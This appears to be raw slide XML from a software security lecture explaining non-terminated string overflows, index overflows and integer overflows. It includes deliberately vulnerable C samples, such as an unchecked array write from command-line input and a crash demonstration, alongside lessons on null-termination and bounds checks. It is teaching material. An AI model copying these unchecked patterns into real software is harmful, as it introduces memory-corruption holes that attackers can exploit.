              </a:rPr>
              <a:t>(username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[2], 512);                                       </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("Checking password %s for user %s\n", password, username);      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>checkpwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(password);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74822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1159">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01159">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01159">
                                            <p:txEl>
                                              <p:pRg st="16" end="1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01159">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01159">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01159">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01159">
                                            <p:txEl>
                                              <p:pRg st="13" end="1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01159">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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01159">
                                            <p:txEl>
                                              <p:pRg st="15" end="1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01159">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01159">
                                            <p:txEl>
                                              <p:pRg st="1" end="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01159">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01159">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01159">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01159">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201159">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2011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130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Non-terminated String Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some functions, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, limit the amount of data copied in the destination buffer but do not include a terminating zero when the limit is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If adjacent buffers are not null-terminated it is possible to cause the copying of an excessive amount of information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21855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0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001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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always make sure that strings are null-terminated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160953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954" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Index Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149955" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This type of overflow exploits the lack of boundary checks in the value used to index an array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They are particularly easy to exploit because they allow for the direct assignment of memory values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that depending on the type of array it is possible to modify only memory values that conform to the data structure in the array</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171810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99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99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499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978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1150979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417639"/>
            <a:ext cx="8229600" cy="4708525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;                        </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>                                           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{                                          </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[8];                            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>;                               </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  index = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strtol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1], NULL, 10); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  value = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strtoul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[2], NULL, 16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  array[index] = value;                    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>arrayoverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 11 "AAAAAAAA" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135130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09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5097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5097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5097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5097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50979">
                                            <p:txEl>
                                              <p:pRg st="12" end="1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5097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50979">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50979">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50979">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50979">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50979">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50979">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150979">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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150979">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Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Always check that array indexes that can be controlled by user input are within the array’s bounds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="788100663"/>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97058" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1197059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer overflows are caused by unexpected results when comparing, casting, and adding integers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
